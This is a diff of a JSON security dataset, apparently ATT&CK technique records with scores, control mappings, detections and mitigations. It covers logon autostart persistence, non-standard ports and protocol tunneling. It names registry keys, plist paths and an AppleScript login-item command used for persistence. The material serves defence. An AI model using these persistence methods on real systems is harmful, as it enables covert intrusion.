-                "detection": "Monitor for changes to Registry entries associated with Winlogon that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns)  New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
-                "mitigations": [
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1547.005",
-                "name": "Boot or Logon Autostart Execution: Security Support Provider",
-                "url": "https://attack.mitre.org/techniques/T1547/005",
-                "description": "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs.\n\nThe SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)",
-                "detection": "Monitor the Registry for changes to the SSP Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned SSP DLLs try to load into the LSA by setting the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\LSASS.exe with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)",
-                "mitigations": [
-                    {
-                        "mid": "M1025",
-                        "name": "Privileged Process Integrity",
-                        "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
-                        "url": "https://attack.mitre.org/mitigations/M1025"
-                    }
-                ]
-            },
-            {
-                "tid": "T1547.006",
-                "name": "Boot or Logon Autostart Execution: Kernel Modules and Extensions",
-                "url": "https://attack.mitre.org/techniques/T1547/006",
-                "description": "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system. (Citation: Linux Kernel Programming) \n\nWhen used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation: Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself, selective hiding of files, processes and network activity, as well as log tampering, providing authenticated backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview)\n\nKernel extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel Extension Deprecation)\n\nAdversaries can use LKMs and kexts to covertly persist on a system and elevate privileges. Examples have been found in the wild and there are some open source projects. (Citation: Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap)",
-                "detection": "Loading, unloading, and manipulating modules on Linux systems can be detected by monitoring for the following commands: modprobe, insmod, lsmod, rmmod, or modinfo (Citation: Linux Loadable Kernel Module Insert and Remove LKMs) LKMs are typically loaded into /lib/modules and have had the extension .ko (\"kernel object\") since version 2.6 of the Linux kernel. (Citation: Wikipedia Loadable Kernel Module)\n\nAdversaries may run commands on the target system before loading a malicious module in order to ensure that it is properly compiled. (Citation: iDefense Rootkit Overview) Adversaries may also execute commands to identify the exact version of the running Linux kernel and/or download multiple versions of the same .ko (kernel object) files to use the one appropriate for the running system.(Citation: Trend Micro Skidmap) Many LKMs require Linux headers (specific to the target kernel) in order to compile properly. These are typically obtained through the operating systems package manager and installed like a normal package. On Ubuntu and Debian based systems this can be accomplished by running: apt-get install linux-headers-$(uname -r) On RHEL and CentOS based systems this can be accomplished by running: yum install kernel-devel-$(uname -r)\n\nOn macOS, monitor for execution of kextload commands and user installed kernel extensions performing abnormal and/or potentially malicious activity (such as creating network connections). Monitor for new rows added in the kext_policy table. KextPolicy stores a list of user approved (non Apple) kernel extensions and a partial history of loaded kernel modules in a SQLite database, /var/db/SystemPolicyConfiguration/KextPolicy.(Citation: User Approved Kernel Extension Pike’s)(Citation: Purves Kextpocalypse 2)(Citation: Apple Developer Configuration Profile)\n",
-                "mitigations": [
-                    {
-                        "mid": "M1049",
-                        "name": "Antivirus/Antimalware",
-                        "description": "Use signatures or heuristics to detect malicious software.",
-                        "url": "https://attack.mitre.org/mitigations/M1049"
-                    },
-                    {
-                        "mid": "M1038",
-                        "name": "Execution Prevention",
-                        "description": "Block execution of code on a system through application control, and/or script blocking.",
-                        "url": "https://attack.mitre.org/mitigations/M1038"
-                    },
-                    {
-                        "mid": "M1026",
-                        "name": "Privileged Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
-                        "url": "https://attack.mitre.org/mitigations/M1026"
-                    }
-                ]
-            },
-            {
-                "tid": "T1547.007",
-                "name": "Boot or Logon Autostart Execution: Re-opened Applications",
-                "url": "https://attack.mitre.org/techniques/T1547/007",
-                "description": "Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. \n\nAn adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).",
-                "detection": "Monitoring the specific plist files associated with reopening applications can indicate when an application has registered itself to be reopened.",
-                "mitigations": [
-                    {
-                        "mid": "M1042",
-                        "name": "Disable or Remove Feature or Program",
-                        "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
-                        "url": "https://attack.mitre.org/mitigations/M1042"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
-            },
-            {
-                "tid": "T1547.008",
-                "name": "Boot or Logon Autostart Execution: LSASS Driver",
-                "url": "https://attack.mitre.org/techniques/T1547/008",
-                "description": "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process. (Citation: Microsoft Security Subsystem)\n\nAdversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.",
-                "detection": "With LSA Protection enabled, monitor the event logs (Events 3033 and 3063) for failed attempts to load LSA plug-ins and drivers. (Citation: Microsoft LSA Protection Mar 2014) Also monitor DLL load operations in lsass.exe. (Citation: Microsoft DLL Security)\n\nUtilize the Sysinternals Autoruns/Autorunsc utility (Citation: TechNet Autoruns) to examine loaded drivers associated with the LSA. ",
-                "mitigations": [
-                    {
-                        "mid": "M1043",
-                        "name": "Credential Access Protection",
-                        "description": "Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.",
-                        "url": "https://attack.mitre.org/mitigations/M1043"
-                    },
-                    {
-                        "mid": "M1025",
-                        "name": "Privileged Process Integrity",
-                        "description": "Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.",
-                        "url": "https://attack.mitre.org/mitigations/M1025"
-                    },
-                    {
-                        "mid": "M1044",
-                        "name": "Restrict Library Loading",
-                        "description": "Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.",
-                        "url": "https://attack.mitre.org/mitigations/M1044"
-                    }
-                ]
-            },
-            {
-                "tid": "T1547.009",
-                "name": "Boot or Logon Autostart Execution: Shortcut Modification",
-                "url": "https://attack.mitre.org/techniques/T1547/009",
-                "description": "Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or symbolic links are ways of referencing other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.\n\nAdversaries could use shortcuts to execute their tools for persistence. They may create a new shortcut as a means of indirection that may use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.",
-                "detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.\n\nMonitor for LNK files created with a Zone Identifier value greater than 1, which may indicate that the LNK file originated from outside of the network.(Citation: BSidesSLC 2020 - LNK Elastic)",
-                "mitigations": [
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
-            {
-                "tid": "T1547.010",
-                "name": "Boot or Logon Autostart Execution: Port Monitors",
-                "url": "https://attack.mitre.org/techniques/T1547/010",
-                "description": "Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\\Windows\\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. \n\nThe Registry key contains entries for the following:\n\n* Local Port\n* Standard TCP/IP Port\n* USB Monitor\n* WSD Port\n\nAdversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.",
-                "detection": "Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. \n\nMonitor Registry writes to HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)",
-                "mitigations": []
-            },
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1547.011",
-                "name": "Boot or Logon Autostart Execution: Plist Modification",
-                "url": "https://attack.mitre.org/techniques/T1547/011",
-                "description": "Adversaries can modify property list files (plist files) to execute their code as part of establishing persistence. Plist files are used by macOS applications to store properties and configuration settings for applications and services. Applications use information plist files, Info.plist, to tell the operating system how to handle the application at runtime using structured metadata in the form of keys and values. Plist files are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary format.(Citation: fileinfo plist file description) \n\nAdversaries can modify paths to executed binaries, add command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon user logon or system startup. Through modifying plist files in these locations, adversaries can also execute a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user logon, the plist is called for execution and the malicious dylib is executed within the process space. Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist file.(Citation: wardle artofmalware volume1)",
-                "detection": "Monitor for common command-line editors used to modify plist files located in auto-run locations, such as ~/LaunchAgents, ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm, and an application's Info.plist. \n\nMonitor for plist file modification immediately followed by code execution from ~/Library/Scripts and ~/Library/Preferences. Also, monitor for significant changes to any path pointers in a modified plist.\n\nIdentify new services executed from plist modified in the previous user's session. ",
-                "mitigations": [
-                    {
-                        "mid": "M1013",
-                        "name": "Application Developer Guidance",
-                        "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.",
-                        "url": "https://attack.mitre.org/mitigations/M1013"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1017",
-                        "name": "User Training",
-                        "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
-                        "url": "https://attack.mitre.org/mitigations/M1017"
-                    }
-                ]
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
             },
             {
-                "tid": "T1547.012",
-                "name": "Boot or Logon Autostart Execution: Print Processors",
-                "url": "https://attack.mitre.org/techniques/T1547/012",
-                "description": "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. \n\nAdversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\\SYSTEM\\\\[CurrentControlSet or ControlSet001]\\Control\\Print\\Environments\\\\[Windows architecture: e.g., Windows x64]\\Print Processors\\\\[user defined]\\Driver Registry key that points to the DLL. For the print processor to be correctly installed, it must be located in the system print-processor directory that can be found with the GetPrintProcessorDirectory API call.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions, therefore print processors installed by an adversary may run under elevated privileges.",
-                "detection": "Monitor process API calls to AddPrintProcessor and GetPrintProcessorDirectory. New print processor DLLs are written to the print processor directory. Also monitor Registry writes to HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\\\Driver or HKLM\\SYSTEM\\CurrentControlSet\\Control\\Print\\Environments\\\\[Windows architecture]\\Print Processors\\\\[user defined]\\Driver as they pertain to print processor installations.\n\nMonitor for abnormal DLLs that are loaded by spoolsv.exe. Print processors that do not correlate with known good software or patching may be suspicious.",
-                "mitigations": [
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
-            },
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.7191745390476191,
+        "adjusted_score": 0.7191745390476191,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "4.5",
+            "7.6",
+            "7.7",
+            "13.3",
+            "13.4",
+            "13.8",
+            "18.2",
+            "18.3"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.21904761904761905,
+            "mitigation_score": 0.38181818181818183,
+            "detection_score": 0.04
+        },
+        "choke_point_score": 0.5,
+        "prevalence_score": 0.00012692
+    },
+    {
+        "tid": "T1571",
+        "name": "Non-Standard Port",
+        "description": "Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.",
+        "url": "https://attack.mitre.org/techniques/T1571",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1547.013",
-                "name": "Boot or Logon Autostart Execution: XDG Autostart Entries",
-                "url": "https://attack.mitre.org/techniques/T1547/013",
-                "description": "Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application Autostart Feb 2006)\n\nWithin an XDG autostart entry file, the Type key specifies if the entry is an application (type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free Desktop Entry Keys)\n\nAdversaries may use XDG autostart entries to maintain persistence by executing malicious commands and payloads, such as remote access tools, during the startup of a desktop environment. Commands included in XDG autostart entries with execute after user logon in the context of the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make XDG autostart entries look as if they are associated with legitimate programs.",
-                "detection": "Malicious XDG autostart entries may be detected by auditing file creation and modification events within the /etc/xdg/autostart and ~/.config/autostart directories. Depending on individual configurations, defenders may need to query the environment variables $XDG_CONFIG_HOME or $XDG_CONFIG_DIRS to determine the paths of Autostart entries. Autostart entry files not associated with legitimate packages may be considered suspicious. Suspicious entries can also be identified by comparing entries to a trusted system baseline.\n \nSuspicious processes or scripts spawned in this manner will have a parent process of the desktop component implementing the XDG specification and will execute as the logged on user.",
-                "mitigations": [
-                    {
-                        "mid": "M1033",
-                        "name": "Limit Software Installation",
-                        "description": "Block users or groups from installing unapproved software.",
-                        "url": "https://attack.mitre.org/mitigations/M1033"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    },
-                    {
-                        "mid": "M1018",
-                        "name": "User Account Management",
-                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1018"
-                    }
-                ]
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
             },
             {
-                "tid": "T1547.014",
-                "name": "Boot or Logon Autostart Execution: Active Setup",
-                "url": "https://attack.mitre.org/techniques/T1547/014",
-                "description": "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup 2010) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries may abuse Active Setup by creating a key under  HKLM\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\ and setting a malicious value for StubPath. This value will serve as the program that will be executed when a user logs into the computer.(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016)\n\nAdversaries can abuse these components to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.",
-                "detection": "Monitor Registry key additions and/or modifications to HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the Active Setup Registry locations and startup folders.(Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.",
-                "mitigations": []
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            }
+        ],
+        "cumulative_score": 0.5580898685714285,
+        "adjusted_score": 0.5580898685714285,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "12.2",
+            "12.8",
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.22857142857142856,
+            "mitigation_score": 0.2545454545454545,
+            "detection_score": 0.2
+        },
+        "choke_point_score": 0.25,
+        "prevalence_score": 0.07951844
+    },
+    {
+        "tid": "T1572",
+        "name": "Protocol Tunneling",
+        "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) \n\n[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure. ",
+        "url": "https://attack.mitre.org/techniques/T1572",
+        "tactics": [
+            "Command And Control"
+        ],
+        "detection": "Monitoring for systems listening and/or establishing external connections using ports/protocols commonly associated with tunneling, such as SSH (port 22). Also monitor for processes commonly associated with tunneling, such as Plink and the OpenSSH client. \n\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol standards regarding syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1037",
+                "name": "Filter Network Traffic",
+                "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.",
+                "url": "https://attack.mitre.org/mitigations/M1037"
             },
             {
-                "tid": "T1547.015",
-                "name": "Boot or Logon Autostart Execution: Login Items",
-                "url": "https://attack.mitre.org/techniques/T1547/015",
-                "description": "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the Service Management Framework uses the API call SMLoginItemSetEnabled.\n\nLogin items installed using the Service Management Framework leverage launchd, are not visible in the System Preferences, and can only be removed by the application that created them.(Citation: Adding Login Items)(Citation: SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System Preferences, can hide the application when it launches, and are executed through LaunchServices, not launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple Developer) Users and applications use login items to configure their user environment to launch commonly used services or applications, such as email, chat, and music applications.\n\nAdversaries can utilize [AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a command such as tell application “System Events” to make login item at end with properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis 2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious executable to the login item file list located in ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic) Adversaries can also use login items to launch executables that can be used to control the victim system remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019)",
-                "detection": "All login items created via shared file lists are viewable by using the System Preferences GUI or in the ~/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm file.(Citation: Open Login Items Apple)(Citation: Startup Items Eclectic)(Citation: objsee block blocking login items)(Citation: sentinelone macos persist Jun 2019) These locations should be monitored and audited for known good applications.\n\nOtherwise, login Items are located in Contents/Library/LoginItems within an application bundle, so these paths should be monitored as well.(Citation: Adding Login Items) Monitor applications that leverage login items with either the LSUIElement or LSBackgroundOnly key in the Info.plist file set to true.(Citation: Adding Login Items)(Citation: Launch Service Keys Developer Apple)\n\nMonitor processes that start at login for unusual or unknown applications. Usual applications for login items could include what users add to configure their user environment, such as email, chat, or music applications, or what administrators include for organization settings and protections. Check for running applications from login items that also have abnormal behavior,, such as establishing network connections.",
-                "mitigations": []
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
             }
         ],
-        "mitigations": [],
-        "cumulative_score": 0.9894025085714285,
-        "adjusted_score": 0.9894025085714285,
-        "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
-        "cis_controls": [],
-        "nist_controls": [],
-        "process_coverage": true,
-        "network_coverage": false,
-        "file_coverage": true,
+        "cumulative_score": 0.4054811247619048,
+        "adjusted_score": 0.4054811247619048,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.2",
+            "4.4",
+            "7.7",
+            "9.3",
+            "13.3",
+            "13.4",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SC-7",
+            "SI-10",
+            "SI-15",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true,
+        "hardware_coverage": false,
         "actionability_score": {
-            "combined_score": 0.22857142857142856,
-            "mitigation_score": 0.01818181818181818,
-            "detection_score": 0.46
+            "combined_score": 0.20476190476190476,
+            "mitigation_score": 0.32727272727272727,
+            "detection_score": 0.07
         },
-        "choke_point_score": 0.44999999999999996,
-        "prevalence_score": 0.31083108
+        "choke_point_score": 0.2,
+        "prevalence_score": 0.00071922
     },
     {
-        "tid": "T1548",
-        "name": "Abuse Elevation Control Mechanism",
-        "description": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.",
-        "url": "https://attack.mitre.org/techniques/T1548",
+        "tid": "T1573",
